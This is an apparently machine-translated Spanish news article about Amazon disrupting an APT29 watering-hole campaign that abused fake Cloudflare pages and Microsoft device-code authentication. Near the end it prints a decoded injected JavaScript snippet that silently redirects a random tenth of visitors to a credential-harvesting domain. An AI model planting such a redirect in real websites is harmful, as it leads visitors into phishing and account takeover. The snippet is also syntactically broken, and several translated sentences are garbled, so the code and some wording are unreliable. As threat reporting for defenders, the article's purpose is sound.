El equipo de inteligencia de amenazas de Amazon descubrió una sofisticada campaña de abrevadero a fines de agosto de 2025, que está orquestada por APT29, también conocida como Midnight Blizzard, un actor relleno de servicio de inteligencia extranjero ruso.
La operación se basó en el compromiso de sitios web legítimos para redirigir a los visitantes desprevenidos a la infraestructura maliciosa.
Una vez redirigido, los usuarios encontraron páginas de verificación de CloudFlare falsificadas diseñadas para cosechar credenciales y engañar a las víctimas para que autorizaran dispositivos controlados por los atacantes a través del flujo de autenticación del código de dispositivo de Microsoft.
La amplitud de la campaña fue sorprendente: aproximadamente el 10 por ciento de los visitantes del sitio fueron desviados a dominios controlados por actores como FindCloudflare (.) Com y Cloudflare.RedirectPartners (.) Com.
Estos dominios imitaban los controles de seguridad oficiales de manera tan convincente que muchos usuarios no pudieron detectar la artimaña.
Imagen de la página comprometida, con nombre de dominio eliminado (fuente – Amazon)
Analistas de Amazon anotado que este enfoque marcó una evolución significativa en la artesanía de APT29. En lugar de confiar únicamente en los correos electrónicos de phishing o el phishing de lanza dirigido, el grupo empleó la inyección oportunista de JavaScript ofuscado en sitios comprometidos.
Esta táctica amplió su posible grupo de víctimas al incrustar las redireccionamientos maliciosos directamente en páginas web populares.
Los visitantes a menudo no sabían que estaban siendo redactados hasta que se les pidió que ingresara códigos de dispositivos o aprobara nuevas autorizaciones de dispositivos, actividades que otorgaron el acceso persistente del actor de amenaza.
El impacto de esta campaña se extendió más allá del mero robo de credenciales. Al integrarse con la autenticación del código de dispositivo de Microsoft, APT29 podría persistir dentro de los entornos corporativos, aprovechando las sesiones autorizadas para moverse lateralmente y recopilar inteligencia.
Aunque no se comprometieron los sistemas de AWS, el incidente subrayó la amenaza persistente que plantea los actores patrocinados por el estado que adaptan sus métodos para evadir las defensas tradicionales.
Amazon trabajó rápidamente con Cloudflare, Microsoft y otros proveedores para desmantelar los dominios maliciosos y aislar instancias de EC2 comprometidas, ilustrando el poder de la respuesta coordinada de la industria.
Descripción técnica de Javascript ofuscado
Una mirada más cercana al guión inyectado revela varias técnicas de evasión avanzadas. La carga útil de JavaScript estaba codificada Base64 para enmascarar su verdadero propósito, y la lógica de aleatorización redirigió solo un subconjunto de visitantes, reduciendo la probabilidad de detección.
Una vez decodificado, el fragmento realizó una redirección del lado del servidor a la página de autenticación fraudulenta mientras configuraba cookies para evitar redireccionamientos repetidos del mismo usuario. Una versión simplificada del código decodificado aparece a continuación:-
(function () {var uid = math.random (). toString (36) .substring (2); if (! document.cookie.includes (‘redir = “+uid) && math.random () <0.1) {document. Cookie =" redir = "+uid+"; path =/'; Window.location.replace ('https://findcloudflare.com/device/code?auth=' + uid);
Este fragmento ejemplifica el cambio de APT29 de las redireccionamientos del lado del cliente al lado del servidor cuando se interrumpió la infraestructura anterior.
Al migrar rápidamente a nuevos dominios y refinar su código, el grupo sostuvo su campaña a pesar de los derribos en curso.
La interrupción exitosa de Amazon de esta infraestructura destaca la necesidad de un monitoreo continuo de las amenazas y la colaboración basadas en la web en toda la comunidad de seguridad.
Aumente su SOC y ayude a su equipo a proteger su negocio con inteligencia gratuita de amenazas de primer nivel: Solicitar prueba de prueba premium de búsqueda TI.
La publicación Amazon desmantela la infraestructura rusa APT 29 utilizada para atacar a los usuarios apareció primero en Cyber Security News.
